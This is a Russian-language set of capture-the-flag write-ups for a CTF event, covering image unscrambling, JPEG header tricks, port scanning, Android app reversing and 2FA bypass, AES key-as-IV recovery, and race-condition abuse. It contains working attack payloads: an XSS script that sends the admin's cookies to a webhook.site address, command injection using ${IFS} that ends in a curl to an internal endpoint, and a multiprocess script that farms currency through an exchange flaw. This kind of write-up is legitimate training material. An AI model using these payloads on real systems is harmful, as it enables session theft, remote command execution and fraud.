Привет, для Гнвоерк написал скрипт:
https://github.com/X-OrBit/MultipleWordleSolver/tree/main

Люди в… каком?

Качаем пнг, смотрим на закодированную пикчу.
Скармливаем сайту картинки размером в несколько пикселей и убеждаемся, что стиратель только меняет местами пиксели, но не их цвет.

Делаем белую картинку размером с flashied.png (точно) и оставляем на ней один яркий пиксель. Видим, что его закинуло в рандомное место.

Добавляем к предыдущей картинке второй пиксель и делаем вывод, что пиксели друг на друга не влияют. Осталось дело за малым - собсна расшифровать пикчу.

Первым делом делаем пикчу такого же размера, но с уникальным цветом каждого пикселя.

Чтобы сохранить расположение пикселя, делаем дбконтекст и модельки для всей этой радости:

using System.ComponentModel.DataAnnotations;

public class Context : DbContext
{
    public Context()
    {
        DbLoggerCategory.Database.OpenConnection();
        Database.EnsureCreated();
    }

    public DbSet<Pixel> Pixels { get; set; }

    // The following configures EF to create a Sqlite database file in the
    // special "local" folder for your platform.
    protected override void OnConfiguring(DbContextOptionsBuilder options) =>
        options.UseSqlite("Data Source=C:\\Games\\vms\\memory\\data.db");
}

public class Pixel
{
    public Pixel(int colorArgb, int beforeX, int beforeY, int afterX, int afterY)
    {
        ColorArgb = colorArgb;
        BeforeX = beforeX;
        BeforeY = beforeY;
        AfterX = afterX;
        AfterY = afterY;
    }

    [Key]
    public int ColorArgb { get; set; }

    public int BeforeX { get; set; }

    public int BeforeY { get; set; }

    public int AfterX { get; set; }

    public int AfterY { get; set; }
}

Затем рисуем собсна саму пикчу с градиентами

using System.Drawing;

#pragma warning disable CA1416

var dbitmap = new DirectBitmap(777, 437);

for (var x = 0; x < dbitmap.Width; x++)
    for (var y = 0; y < dbitmap.Height; y++)
    {
        var r = x % 255;
        var g = y % 255;
        var b = (x / 255 + 1) * (y / 255 + 10);

        dbitmap.SetPixel(x, y, Color.FromArgb(r, g, b));
        db.Pixels.Add(new Pixel(Color.FromArgb(r, g, b).ToArgb(), x, y, 0, 0));
    }

dbitmap.Bitmap.Save("C:\\Games\\vms\\memory\\gradient.png");
db.SaveChanges();

Совсем забыл, для того, чтобы битмап работал сильно быстрее (без накладных расходов на кучу всего) я сделал свой directbitmap с блекджеком и куртизанками. В демонстрационных целях можно с дефолтным.
А еще в net core просто так нет system drawing и поэтому надо подключить пакет Microsoft.Windows.Compatibility

Скармливаем градиент сайту и получаем на выходе нужную нам пикчу. Сопоставляем исходные и конечные позиции

using var db = new Context();

var bitmap = new Bitmap("C:\\Games\\vms\\memory\\noname.png");


for (var x = 0; x < bitmap.Width; x++)
    for (var y = 0; y < bitmap.Height; y++)
    {
        var pixel = bitmap.GetPixel(x, y);

        var dbpixel = db.Pixels.First(p => p.ColorArgb == pixel.ToArgb());
        dbpixel.AfterX = x;
        dbpixel.AfterY = y;
    }

db.SaveChanges();

Затем осталось самое простое - сопоставить финальные значения пикчи из условия и заведомо известные исходные значения. Заварите кофейку, оптимизации завезли только чуть-чуть

using var db = new Context();

var bitmap = new Bitmap("C:\\Games\\vms\\memory\\flashiedю3.png");
var dbitmap = new DirectBitmap(777, 437);

var pixels = db.Pixels.ToList();
pixels.Sort((p1, p2) => p1.AfterX.CompareTo(p2.AfterX));

for (var x = 0; x < bitmap.Width; x++)
{
    Stopwatch sw = new Stopwatch();
    sw.Start();
    for (var y = 0; y < bitmap.Height; y++)
    {
        var pixel = bitmap.GetPixel(x, y);

        var dbpixel = pixels.First(p => p.AfterX == x && p.AfterY == y);
            
        dbitmap.SetPixel(dbpixel.BeforeX, dbpixel.BeforeY, pixel);
    }
    
    sw.Stop();
    Console.WriteLine(sw.Elapsed);
    Console.WriteLine(x);
    if(x % 5 == 0)
        dbitmap.Bitmap.Save("C:\\Games\\vms\\memory\\flag4.png");
}

Ну собсна и все. Конца выполнения можно и не ждать

Иван Васильевич

Тут вообще ничего сложного нет. Читаем на вики про CVE, читаем на вики про JPG, открываем любым бинарным редактором и стираем из середины метку конца 0xFFD9

Потом читаем еще раз спеку и расшишериваем пикчу редактированием метки 0xFFC0 (на пикче line NB и samples/line)

Вниз можно расшишеривать пока совесть позволяет, а вот в сторону придется подобрать (читаем про бинарный поиск или тупо брутфорсим скриптом).
Кода не будет, я его успешно потер, но там где-то около 350-400 семплов.

Внимание, подвох: в браузере, телеге, виндовых фотографиях и иже с ними вы ничо не увидите. Лично я открывал в JB Rider

Бредущий по лезвию

Тут тоже все максимально просто.
Заходим, видим 403, выходим.
Открываем консоль, пишем
nmap -p0- %url%
Видим чета на 9090. Открываем свой богатый жизненный опыт, широкий кругозор и вспоминаем, что на 9090 порту обычно обитает прометеус. Идем на адрес .spbctf.ru:9090/metrics и наблюдаем там статистику от its-private-domain-for-secure-android-storage.
Идем по этому домену, дописываем в конец /storage и смотрим на флаг

Великая отмена

введем в коде две рандомные почты

запускаем код в несколько процессов, сначала ~5-10 canceler'ов, после один sender

скрипт автоматически создаст аккаунты и начнет отменять одну и ту же транзакцию, в следствие чего, в первом аккаунте будут фармятся шиитакоины

далее вручную покупаем чайный гриб и получаем нужный флаг (данные от аккаунта будут лежать в папке accounts около скрипта)

вот еще райтапчик на великую отмену :)

Планетарная важность.

Открываем сайт, жмем F12.
Наблюдаем запрос execute?cmd=get-status
Делаем такой же, но execute?cmd=ls
Далее вставляем везде вместо пробелов` ${IFS}`, читаем файлы и все такое.
Когда надоест, делаем execute?cmd=curl${IFS}-s${IFS}http://management:5000/restart/ и радуемся флагу.

Теперь точно все

Герой Пустошей (Аквачип)
Android .apk

Первая часть:
Скачиваем aquachip.apk и устанавливаем на эмулятор.
При попытке установки скорее всего adb зависнет,
а если перетягивать на эмулятор - молча падает.

Чтобы понять в чём ошибка, нужно закинуть .apk файл на эмулятор:
adb push aqua.apk /sdcard/Download
После этого установить с помощью PM (Packet Manager) внутри Anroid:

adb shell
cd /sdcard/Download
pm install aqua.apk

Получится ошибка:
Failure [INSTALL_FAILED_NO_MATCHING_ABIS: Failed to extract native libraries, res=-113]
Это означает, что не подходит архитектура процессора для нативных библиотек.

Запускаем реверс: apktool d -o aqua-backsmali aqua.apk
или же просто распаковываем .apk как зип архив.
В файлах видим: lib/
arm64-v8a, armeabi-v7a, x86_64
Из-за этих библиотек и падает (нет варианта для обычного эмулятора).

x86_64 - нужный вид эмулятора.
Устанавливаем такой эмулятор (например, через Android Studio) и запускаем на нём.

Часть вторая:
Настраиваем эмулятор для перехвата траффика
Вот статья: (book.hacktricks.xyz /mobile-pentesting/android-app-pentesting/avd-android-virtual-device)

В приложении включаем все переключатели и пробуем запустить, получаем ошибку
"Secret Module not enabled".
В Burp видно, что каждый модуль при включении посылает запрос с id= [номер модуля]
В repeater посылаем такой же запрос, но со следующим номером по порядку после всех модулей.
После этого Аквачип работает.

NAMCAP
Gamechanger (Pacman)
android, .apk

Если покопаться в коде,
в классе с запросами в сеть есть debug функция loginAdmin, где прописан пароль админа.

Запускаем приложение, заходим в Settings, там написан логин админа.

На форме входа вводим логин и пароль админа, но у него включена 2FA.
Высылается одноразовый пароль.
Приложение спамит уведомлениями при этом.
При логине нам выдало токен, но все остальные методы не работают, требуют 2FA.
Уязвимость заключается в том, что работает метод просмотра уведомлений с токеном до того как будет пройдена 2FA.
Конструируем в repeater запрос уведомлений с токеном админа и там будет OTP.
Заходим и переключаем в настройках Gamechanger.

Песчаный холм: когда в AES ключ совпадает с IV, достаточно иметь данные вида X + 0 + X, где X — 16 каких-то байт, 0 — 16 нулевых байт, тогда в результате декодинга спалится ключ

Объяснение: https://crypto.stackexchange.com/questions/16161/problems-with-using-aes-key-as-iv-in-cbc-mode

Мегастог: XSS в поле address формы регистрации. Крадем куки админа <noscript>document.location='https://webhook.site/776b5bec-1809-462d-a9fa-280952a93dc6?cookie='+document.cookie;</noscript> и открываем admin-dashboard.

Свой среди чужих
Дан хост с Ubuntu, даны креды от юзера в хомяке которого флаг, но настроена двухфакторка. Лезем в /etc/pam.d, смотрим что файл su изменен недавно, читаем его и обращаем внимание на обязательную либу: pam_tgotp.so. Находим её, читаем строки с помощью strings, в одной из строк токен бота. Дампим бота по токену, получаем код ОТП, авторизуемся.

Пиццаувелечитель:

Ошибка в бизнеслогике на оркугление при обмене Беконника на Гастрофранк. За одну итерацию выигрываем 2 беконника. А потом ещё в мульипоточность ставим и помоему рэйс кондишен получаем, но это не точно.

import requests as req
from multiprocessing import Process

url = "https://its-grand-supermarket-f0e1aqq7.spbctf.ru/api/exchange"
cookie = {"__cfduid":"d751382105124a1e58fff8cbd6071320", "session": "fd525692-47fa-4fb1-aca2-c6401f7ad51a"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
          "Origin": "https://its-grand-supermarket-f0e1aqq7.spbctf.ru",
           "Referer": "https://its-grand-supermarket-f0e1aqq7.spbctf.ru/account",
           "Upgrade-Insecure-Requests": "1",
          "Sec-Fetch-Dest": "document",
           "Sec-Fetch-Mode": "navigate",
           "Sec-Fetch-Site": "same-origin",
           "Sec-Fetch-User": "?1",
           "Te": "trailers"
}
first_data = {"amount": 1,"cur_from":"Гастрофранк", "cur_to": "Беконик",
              "submit": "%D0%9E%D0%B1%D0%BC%D0%B5%D0%BD%D1%8F%D1%82%D1%8C"}
second_data = {"amount":428, "cur_from":"Беконик", "cur_to":"Гастрофранк",
               "submit":"%D0%9E%D0%B1%D0%BC%D0%B5%D0%BD%D1%8F%D1%82%D1%8C"}

def givme_money():
    for _ in range(2000):
        req.post(url, headers=headers, cookies=cookie, data=first_data)
        req.post(url, headers=headers, cookies=cookie, data=second_data)
        print("Попытка: ", _)


for _ in range(15):
    p = Process(target=givme_money)
    p.start()